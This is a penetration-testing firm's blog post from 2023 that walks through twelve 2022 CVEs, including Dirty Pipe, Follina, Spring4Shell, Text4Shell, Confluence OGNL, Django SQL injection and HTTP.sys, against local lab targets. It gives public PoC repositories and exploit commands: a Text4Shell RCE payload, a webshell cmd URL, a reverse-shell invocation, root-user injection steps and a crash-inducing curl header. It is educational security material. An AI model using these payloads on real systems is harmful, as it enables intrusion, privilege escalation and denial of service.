17 Jan, 2023

CVE TOP 12 in 2022 for penetration testing

Penetration Testing as a service (PTaaS)

Tests security measures and simulates attacks to identify weaknesses.

What is CVE or Common Vulnerabilities and Exposures?

CVE is a publicly available and free to use database / glossary of disclosed cyber security issues and their classification. This database is maintained by MITRE Corporation with funds from the U.S. Department of Homeland Security.

Each vulnerability has a unique identifier, evaluation, and listing in the MITRE glossary. This has been done to unify communication between the security and technology industries that now can refer to this standard.

The glossary uses the Common Vulnerability Scoring System or CVSS to evaluate the severity or threat level of a vulnerability. Why? We need to understand how much damage we can get from a particular security problem and then prioritize it. The assessment depends not only on the technology, but also on the business structure of the company.

Top 10 detected threats for month in Ukraine ( source )

1  Multi.Desert.gen 16,67%
2 Win32.ShadowBrokers.ae 8,89%
3 IphoneOS.Vortex.a 7,41%
4 EMSOffce.CVE-2018-0802.gen 5,19%
5 AndroidOS.Psneuter.a 4,81%
6 Win32.Agent.gen 4,81%
7 AndroidOS.Lotoor.cd 3,70%
8 AndroidOS.Lotoor.bm 3,70%
9 Win32.ShadowBrokers.aa 2,96%
10 Java.CVE-2013-1493.x 2,96%


Severity High Privilege escalation in Linux kernel

The vulnerability allows a local user to escalate privileges on the system. The vulnerability exists due to usage of an uninitialized resources. A local user can overwrite arbitrary file in the page cache, even if the file is read-only, and execute arbitrary code on the system with elevated privileges. The vulnerability was dubbed Dirty Pipe. Linux kernel versions newer than 5.8 are affected.

So far, the vulnerability has been patched in the following Linux kernel versions: 5.16.11 / 5.15.25 / 5.10.102


Clone the repository and follow the instructions for compiling the exploit:



Usage exploit-1 Unprivileged user can change the root password to “piped”.

For Linux 5.18.0 (which is not vulnerable):

For Linux 5.11.0 (which is vulnerable):


There’s also scanner for CVE-2022-0847. Simply it shows whether the version of Kali kernel vulnerable or not


Usage exploit-2 You can inject and overwrite data in read-only SUID process memory that run as root.

For Linux 5.18.0 (which is not vulnerable):

For Linux 5.11.0 (which is vulnerable):

[+] hijacking suid binary..

[+] dropping suid shell..

[+] restoring suid binary..

[+] pooping root shell..


uid=0(root) gid=0(root) groups=0(root), 1001(developer)






Severity Critical Remote code execution in Microsoft Windows

The vulnerability allows a remote attacker to execute arbitrary shell commands on the target system. The vulnerability exists due to improper input validation when processing URL within the Microsoft Windows Support Diagnostic Tool (MSDT). A remote unauthenticated attacker can trick the victim to download (for example from the email) and open a specially crafted file, which calls the ms-msdt tool and execute arbitrary OS commands on the target system. Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.


Clone the repository and follow the instructions for compiling the exploit:








Severity Critical Sensitive Data Exposure in Easyappointments 1.4.3 

This vulnerability allows Exposure of Private Personal Information to an Unauthorized Actor in GitHub repository alextselegidis/easyappointments prior to 1.4.3.


Clone the repository and follow the instructions for compiling the exploit:



Vulnerable website is hosted on localhost and its whole database is dumped including username, password and other PII Data of the users.






Severity Critical Injection in Atlassian Confluence

Confluence is a collaborative documentation and project management framework for teams. It helps track project status by offering a centralized workspace for members. This CVE uses an injection vulnerability within the OGNL (Object-Graph Navigation Language) expression language for Java that would allow an unauthenticated attacker to execute arbitrary code. OGNL is used for getting and setting properties of Java objects, amongst many other things.


Clone the repository and follow the instructions for compiling the exploit:



Atlassian Confluence 7.3.5 is used below as a vulnerable environment. Arbitrary codes can be executed by an unauthenticated user.





Severity High Privilege Escalation in Linux Kernel 

A vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.


Clone the repository and follow the instructions for compiling the exploit:



1 Create a SHA512Crypt hash of your chosen password with openssl passwd -6 –salt THM “PASSWORD”

2 Compile the exploit using the command gcc poc.c -o exploit

3 Run the exploit to add a root user into the passwd file:






Severity High Apache Spark Shell Command Injection Vulnerability

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, it checks whether a user has access permissions to view or modify the application.  If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as.

This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.


Clone the repository and follow the instructions for compiling the exploit:


Usage exploit-1 Check if the server is vulnerable: python3 poc.py -u http://localhost -p 8080 –check –verbose   

For vulnerable target:

For non- vulnerable target:

Usage exploit-2 You can use the poc to obtain reverse shell

python3 poc.py -u http://localhost -p 8080 –revshell -lh <IP> -lp <PORT> –verbose 

For vulnerable target:






Severity Critical Spring4Shell – Spring Core RCE 

A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.


Start a vulnerable docker image of Spring using the command:

docker run -d -p 8082:8080 –name springrce -it vulfocus/spring-core-rce-2022-03-29 

This binds the vulnerable Spring to the address localhost:8082. Visit http://localhost:8082 to check

Clone the exploit from https://github.com/TheGejr/SpringShell and run the following command to check if the server is vulnerable

python3 exp.py –url http://localhost:8082 

You can now exploit this vulnerability by visiting the shell address and changing the value of cmd parameter.

a) For url: http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami, output of whoami is returned.

b) For url: http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls 






Severity Critical Apache commons-text vulnerability

Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is “${prefix:name}”, where “prefix” is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers.

These lookups are: – “script” – execute expressions using the JVM script execution engine (javax.script) – “dns” – resolve dns records – “url” – load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Apache Commons Text Version 1.5 to 1.9 are affected.


Clone the repository and move inside it https://github.com/akshayithape-devops/CVE-2022-42889-POC 

Build the vulnerable application image using Docker: d

ocker build –tag=test/text4shell . 

Make a container and build the image: docker run -it -p 80:8080 –name text4shell test/text4

Open new terminal tab and run below command to enter into terminal of webserver docker exec -it text4shell /bin/bash

List all the files in the directory using the ls command and see text4shell-poc.jar

Open a new terminal. Make a request to the webserver. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: ${script:javascript:java.lang.Runtime.getRuntime().exec(‘touch newfile.txt’)}

For example: the following command should trigger request to make a new file on server:

curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20hello.txt%27%29%7D

Check if the file is created on the server by using ls command again. We can see that file is successfully created. This proves that arbitrary remote code execution is possible.

bash-4.4# ls
bash-4.4# ls
hello.txt  ⠀⠀⠀test4shell-poc.jar









Severity Critical SQL injection Vulnerability in Django

A SQL injection vulnerability was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4.

QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed keyword arguments.


Clone the repository and follow the instructions to start a vulnerable server:


Usage exploit-1 Check the version of sqlite database used:,%22,sqlite_version(),%223%22%20–

see test-1 3.39.4 in response

Usage exploit-2 List all the tables of sqlite database,%22,tbl_name,%223%22%20FROM%20sqlite_master%20WHERE%20type=%27table%27%20and%20tbl_n








Severity Critical HTTP Protocol Stack Remote Code Execution Vulnerability 

CVE-2022-21907 (CVSSv3 9.8) is a major flaw affecting the HTTP Protocol Stack (HTTP.sys). HTTP.sys is a kernel device driver present in current Microsoft Windows operating systems that is in charge of HTTP traffic processing in services such as Microsoft IIS.

Due to this vulnerability, an attacker can trigger the infamous “Blue Screen of Death” crash in the underlying machine that runs an unpatched HTTP.sys driver. The disruption this vulnerability can cause is rather severe, and although systems might restart and function properly after one attack, subsequent attacks could lead to a complete denial of service.



To repro this exploit, IIS server should be up (In this case, windows 10 version 2004 (OS Build: 19041.329) is used) and open the server page at localhost.

Once the setup is done, get the IP of the host and run this curl command in terminal.

curl -sH “Accept-encoding: 354429474810858105277502,753225473272192695969




*****************267816, *, ,” 

Once the command is executed observe that the host down with the blue screen death crash.

This Poc can also be reproduced with the Git Repo: https://github.com/ZZ-SOCMAP/CVE-2022-21907









Severity High Windows Print Spooler Elevation of Privilege Vulnerability (LPE)

The vulnerability (CVE-2022-21999), which has a CVSS score of 7.8 (High), allows the attacker elevated rights if exploited successfully.  A vulnerable exe should be used by a normal user, and a command in shell should be executed to elevate the role by creating an admin account on the host.



To replicate this vulnerability. In the host, a normal user account is required, and then a user can elevate privileges by executing a vulnerable exe to create an admin account with the default password: “Passw0rd!”

This Poc can also be reproduced with the Git Repo: https://github.com/ly4k/SpoolFool









Severity Critical F5 BIG-IP iControl REST vulnerability RCE exploit with Java

Undisclosed requests may bypass iControl REST authentication. This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services.




To replicate this vulnerability. A Git repo on the host can be used to determine whether or not the host is vulnerable. In this case, a vulnerable host with the BIG-IP service running is used in order to identify this vulnerability.

To determine the severity here, an arbitrary code is entered, and the server successfully pings back with the desired result without any authentication mechanism.

This Poc can also be reproduced with the Git Repo: https://github.com/Zeyad-Azima/CVE-2022-1388










Thanks for reading!

Other Services

Ready to secure?

Let's get in touch